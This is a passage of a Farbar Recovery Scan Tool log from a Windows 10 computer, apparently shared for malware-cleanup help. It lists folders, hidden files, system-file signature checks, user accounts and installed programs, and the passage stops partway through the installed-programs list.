2017-08-30 18:40 - 2017-07-01 17:30 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2017-08-30 18:40 - 2017-07-01 17:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2017-08-30 18:40 - 2017-06-21 21:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2017-08-30 18:40 - 2017-06-03 15:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Need for Speed™ Most Wanted
2017-08-30 18:40 - 2017-05-20 21:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Just Cause 2
2017-08-30 18:40 - 2017-04-30 13:07 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan
2017-08-30 18:40 - 2017-04-12 21:05 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Metal SLUG X 1.0
2017-08-30 18:40 - 2017-03-25 20:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NARUTO SHIPPUDEN Ultimate Ninja STORM 3 Full Burst
2017-08-30 18:40 - 2017-02-12 12:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Atheros
2017-08-30 18:40 - 2017-02-12 12:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap
2017-08-30 18:40 - 2016-12-29 18:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SketchUp 2017
2017-08-30 18:40 - 2016-12-24 00:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MEGAsync
2017-08-30 18:40 - 2016-12-07 20:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2017-08-30 18:40 - 2016-11-27 14:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Baidu WiFi Hotspot
2017-08-30 18:40 - 2016-11-24 14:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hotspot Shield
2017-08-30 18:40 - 2016-11-23 16:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\arcai.com
2017-08-30 18:40 - 2016-11-12 18:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sades 7.1CH Gaming Headset
2017-08-30 18:40 - 2016-11-10 08:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Games for Windows Marketplace
2017-08-30 18:40 - 2016-11-09 22:37 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-08-30 18:40 - 2016-11-09 08:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam Customizer
2017-08-30 18:40 - 2016-10-18 17:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-08-30 18:40 - 2016-10-17 22:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sniper Ghost Warrior 2
2017-08-30 18:40 - 2016-10-17 18:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splinter Cell Conviction
2017-08-30 18:40 - 2016-10-12 18:19 - 000000000 ____D C:\ProgramData\regid.1986-12.com.adobe
2017-08-30 18:40 - 2016-09-27 20:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016
2017-08-30 18:40 - 2016-09-27 20:55 - 000000000 ____D C:\WINDOWS\SHELLNEW
2017-08-30 18:40 - 2016-09-24 13:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2017-08-30 18:40 - 2016-09-22 17:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-08-30 18:40 - 2016-09-22 15:03 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TechPowerUp GPU-Z
2017-08-30 18:40 - 2016-09-22 14:34 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2017-08-30 18:40 - 2016-09-22 14:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2017-08-30 18:40 - 2016-09-21 23:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2017-08-30 18:40 - 2016-09-21 23:44 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO
2017-08-30 18:40 - 2016-09-21 23:43 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-08-30 18:40 - 2016-09-21 23:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-08-30 18:40 - 2016-09-21 23:32 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel
2017-08-30 18:40 - 2016-09-21 23:29 - 000000000 ____D C:\WINDOWS\system32\nn-NO
2017-08-30 18:40 - 2016-09-21 23:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Audio
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\system32\winrm
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\system32\WCN
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\system32\slmgr
2017-08-30 18:34 - 2017-03-19 09:28 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\system32\dsc
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\spool
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\MUI
2017-08-30 18:34 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-08-30 18:34 - 2017-03-18 18:40 - 000000000 ____D C:\WINDOWS\system32\Dism
2017-08-30 18:34 - 2016-11-09 22:40 - 000000000 ____D C:\WINDOWS\SysWOW64\xlive
2017-08-30 18:34 - 2016-09-30 18:29 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-08-30 18:34 - 2016-05-14 00:12 - 000000000 ____D C:\WINDOWS\SysWOW64\hi-IN
2017-08-30 18:34 - 2016-05-14 00:12 - 000000000 ____D C:\WINDOWS\system32\hi-IN
2017-08-30 18:31 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\System
2017-08-30 18:31 - 2016-12-16 18:20 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2017-08-30 18:30 - 2017-07-07 19:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TAP-Windows
2017-08-30 18:30 - 2017-07-07 19:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Betternet Technologies Inc
2017-08-30 18:30 - 2017-05-26 19:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-08-30 18:30 - 2017-05-25 20:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Activision
2017-08-30 18:30 - 2017-03-26 11:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-08-30 18:30 - 2017-03-19 19:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\2K Sports
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\IME
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\Help
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\Cursors
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\ProgramData\USOPrivate
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\Program Files\Common Files\System
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2017-08-30 18:30 - 2017-03-19 04:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-08-30 18:30 - 2017-01-28 16:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2017-08-30 18:30 - 2016-12-04 22:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NewBlue
2017-08-30 18:30 - 2016-11-24 20:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicam
2017-08-30 18:30 - 2016-11-09 10:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com
2017-08-30 18:30 - 2016-11-03 18:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ripstone
2017-08-30 18:30 - 2016-10-31 20:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Red Barrels
2017-08-30 18:30 - 2016-10-23 12:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Capcom
2017-08-30 18:30 - 2016-10-18 20:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Studios
2017-08-30 18:30 - 2016-10-16 10:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-08-30 18:30 - 2016-10-05 20:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Square Enix
2017-08-30 18:30 - 2016-09-30 16:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Electronic Arts
2017-08-30 18:30 - 2016-09-22 22:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics
2017-08-30 18:30 - 2016-09-22 15:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID
2017-08-30 18:29 - 2015-10-30 14:24 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2017-08-30 18:28 - 2016-12-18 13:42 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-08-30 18:27 - 2017-01-28 16:35 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Syncios
2017-08-30 18:27 - 2016-11-01 23:00 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bigasoft
2017-08-30 18:24 - 2017-03-18 18:40 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2017-08-30 17:45 - 2016-09-22 13:52 - 000008192 __RSH C:\BOOTSECT.BAK
2017-08-27 18:02 - 2016-09-22 17:36 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\ElevatedDiagnostics
2017-08-24 21:56 - 2016-10-16 10:26 - 000000000 ____D C:\WINDOWS\pss
2017-08-24 21:49 - 2016-09-25 13:49 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Skype
2017-08-20 20:05 - 2017-07-22 18:07 - 000001224 _____ C:\Users\Aezia Aznan\advanced_ip_scanner_MAC.bin
2017-08-20 20:05 - 2017-07-22 18:07 - 000000015 _____ C:\Users\Aezia Aznan\advanced_ip_scanner_Comments.bin
2017-08-20 20:05 - 2017-07-22 18:07 - 000000015 _____ C:\Users\Aezia Aznan\advanced_ip_scanner_Aliases.bin
2017-08-20 05:31 - 2016-11-21 17:59 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\Google
2017-08-20 05:31 - 2016-11-21 17:59 - 000000000 ____D C:\Program Files (x86)\Google
2017-08-18 17:39 - 2016-09-22 16:43 - 000544424 _____ (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-13 01:23 - 2017-07-07 19:22 - 000000000 ____D C:\ProgramData\Betternet
2017-08-13 01:12 - 2016-10-18 11:37 - 000000584 _____ C:\WINDOWS\system32\Drivers\etc\hosts.ics
2017-08-11 20:42 - 2017-04-10 20:22 - 000000000 ____D C:\Users\Aezia Aznan\Documents\Telltale Games
2017-08-11 19:54 - 2017-06-21 21:52 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\vlc
2017-08-10 19:26 - 2016-09-21 23:18 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\NVIDIA Corporation
2017-08-06 14:47 - 2016-09-22 16:40 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-06 14:41 - 2016-09-22 16:40 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-06 14:06 - 2016-09-21 23:18 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\NVIDIA
 
==================== Files in the root of some directories =======
 
2017-04-15 22:01 - 2017-04-15 22:01 - 002910365 _____ () C:\Program Files\WinRAR.rar
2016-10-25 20:55 - 2016-10-25 20:55 - 110033810 _____ () C:\Program Files (x86)\Origin.rar
2017-06-26 21:41 - 2017-06-26 21:41 - 000000132 _____ () C:\Users\Aezia Aznan\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-10-12 18:25 - 2017-06-23 14:18 - 000000034 _____ () C:\Users\Aezia Aznan\AppData\Roaming\AdobeWLCMCache.dat
2016-09-25 13:53 - 2016-09-25 13:53 - 000000480 ____H () C:\Users\Aezia Aznan\AppData\Roaming\½Ó
2016-09-27 08:52 - 2017-06-21 14:43 - 000007594 _____ () C:\Users\Aezia Aznan\AppData\Local\Resmon.ResmonCfg
2016-11-24 15:34 - 2016-11-24 15:34 - 000000000 _____ () C:\Users\Aezia Aznan\AppData\Local\{F1047976-43E6-49A6-BF52-4CA86F14DF92}
2016-09-25 13:54 - 2016-09-25 13:54 - 000000008 ____H () C:\ProgramData\@000001.dat
2016-09-25 13:54 - 2016-09-25 16:12 - 000000000 ____H () C:\ProgramData\@system.temp
2016-09-25 13:53 - 2016-09-25 15:11 - 000000656 ____H () C:\ProgramData\@system3.att
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____H () C:\ProgramData\DP45977C.lfl
 
Files to move or delete:
====================
C:\ProgramData\@000001.dat
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-08-30 18:18
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-08-2017 01
Ran by Aezia (01-09-2017 19:52:00)
Running from C:\Users\Aezia Aznan\Downloads
Windows 10 Pro Version 1703 (X64) (2017-08-30 11:59:34)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3909864297-3729878400-1751894149-500 - Administrator - Disabled)
Aezia (S-1-5-21-3909864297-3729878400-1751894149-1001 - Administrator - Enabled) => C:\Users\Aezia Aznan
DefaultAccount (S-1-5-21-3909864297-3729878400-1751894149-503 - Limited - Disabled)
Guest (S-1-5-21-3909864297-3729878400-1751894149-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3909864297-3729878400-1751894149-1035 - Limited - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
"Just Cause 2" (HKLM-x32\...\{E2FC9928-87BE-4947-B68E-4A3414E33767}_is1) (Version:  - )
µTorrent (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\uTorrent) (Version: 3.5.0.43580 - BitTorrent Inc.)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Adobe Illustrator CC 2015 (HKLM-x32\...\{5680D629-B263-49CC-821E-3CEBD4507B51}) (Version: 19.2.0 - Adobe Systems Incorporated)
Advanced IP Scanner 2.5 (HKLM-x32\...\{6ABB4DB7-5E8F-4F7A-AAF2-C7B4337B7161}) (Version: 2.5.3233 - Famatech)
Age of Empires III - Complete Collection (HKLM-x32\...\Age of Empires III - Complete Collection_is1) (Version:  - )
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
Assassin's Creed IV Black Flag (HKLM-x32\...\Assassin's Creed IV Black Flag_is1) (Version: Assassin's Creed IV Black Flag - )
Assassin's Creed Revelations (HKLM-x32\...\{33A22B2D-55BA-4508-B767-BF2E9C21A73F}) (Version: 1.00 - Ubisoft)
ASUS PC Link (HKLM-x32\...\{52AE8601-EA55-456E-80A9-7FB48E82CF81}_is1) (Version: 3.0.22.1029 - ASUSTEK)
Backup and Sync from Google (HKLM-x32\...\{4E99D34D-1CF8-45FA-BB4D-FBF30EA6E2FE}) (Version: 3.35.6251.4621 - Google, Inc.)
Baidu WiFi Hotspot (HKLM-x32\...\Baidu WiFi Hotspot) (Version: 5.1.4.124910 - Baidu, Inc.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.2.4.1118 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Betternet for Windows (HKLM-x32\...\{2E77104D-96E1-4A9C-86F2-C7CF4C703830}) (Version: 3.8.3.0 - Betternet Technologies Inc.)
Bigasoft Total Video Converter 5.0.6.5658 (HKLM-x32\...\{A72CE741-1F32-4D79-BFFB-A714375C6750}_is1) (Version:  - Bigasoft Corporation)
Call of Duty - World at War (HKLM-x32\...\Call of Duty - World at War_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Call of Duty® 4 - Modern Warfare™ (HKLM-x32\...\{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.00.0000 - Activision) Hidden
Call of Duty® 4 - Modern Warfare™ (HKLM-x32\...\InstallShield_{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.00.0000 - Activision)
Call of Duty: Black Ops (HKLM-x32\...\Call of Duty: Black Ops_is1) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
CodeBlocks (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\CodeBlocks) (Version: 16.01 - The Code::Blocks Team)
Counter-Strike Global Offensive WaRzOnE (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\CSGO) (Version:  - CS WaRzOnE)
CPUID CPU-Z MSI 1.77 (HKLM\...\CPUID CPU-Z MSI_is1) (Version: 1.77 - CPUID, Inc.)
CPUID HWMonitor Pro 1.26 (HKLM\...\CPUID HWMonitorPro_is1) (Version:  - )
CyberLink PowerDirector 14 (HKLM-x32\...\{6BADCD73-E925-46F7-A295-FF2448632728}) (Version: 14.0.2019.0 - CyberLink Corp.)
Dead Island Riptide (HKLM\...\Steam App 216250) (Version:  - Techland)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.2.17.55 - Synaptics Incorporated)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
DEVIL MAY CRY 4 (HKLM-x32\...\{D4E5A687-797D-44B1-8F96-4FD7A24166A9}) (Version: 1.00.000 - CAPCOM CO., LTD.)
DriverAgent-Plus 3.2016.10.12 (HKLM-x32\...\DriverAgent-Plus_is1) (Version:  - eSupport.com, Inc)
Epic Games Launcher (HKLM-x32\...\{2DE76AAC-8061-4D9B-B7BA-A7CFBE0F8048}) (Version: 1.1.86.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Final Fantasy XIII-2 (HKLM-x32\...\{4643D84D-4F97-49C1-9B86-6FB4DA5E706E}) (Version: 1.00.0000 - SQUARE ENIX)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.113 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Hotspot Shield 6.1.1 (HKLM-x32\...\{AF599C42-A2E5-4251-B7EE-4925B137BA53}) (Version: 6.1.1.10032 - AnchorFree Inc.) Hidden
Hotspot Shield 6.1.1 (HKLM-x32\...\{e829c2f6-17c1-4a94-850f-d564d315be9d}) (Version: 6.1.1.10032 - AnchorFree Inc.)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.19.108.1 - Intel Security)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 1.1.253.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
Jumpstart Installation Program (HKLM-x32\...\{B0BCDCBD-863D-4CAB-BF68-8D1F6B1BDC13}) (Version:  - Atheros)
KB4023057 (HKLM\...\{27C6D60B-CAD4-4C70-A1F2-299C731EA8F7}) (Version: 2.0.0.0 - Microsoft Corporation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Logitech Gaming Software 8.87 (HKLM\...\Logitech Gaming Software) (Version: 8.87.116 - Logitech Inc.)
Mad Max (HKLM\...\Steam App 234140) (Version:  - Avalanche Studios)
Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.6.6331.1 - Waves Audio Ltd.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Metal SLUG X 1.0 (HKLM-x32\...\Metal SLUG X 1.0) (Version: 1.0 - Èãðû íà Cat-A-Cat.NET)
Metro 2033 (HKLM-x32\...\Metro 2033_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\OneDriveSetup.exe) (Version: 17.3.6943.0625 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{2DFD8316-9EF1-3210-908C-4CB61961C1AC}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{527BBE2F-1FED-3D8B-91CB-4DB0F838E69E}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40649 (HKLM-x32\...\{5d0723d3-cff7-4e07-8d0b-ada737deb5e6}) (Version: 12.0.40649.5 - Microsoft Corporation)
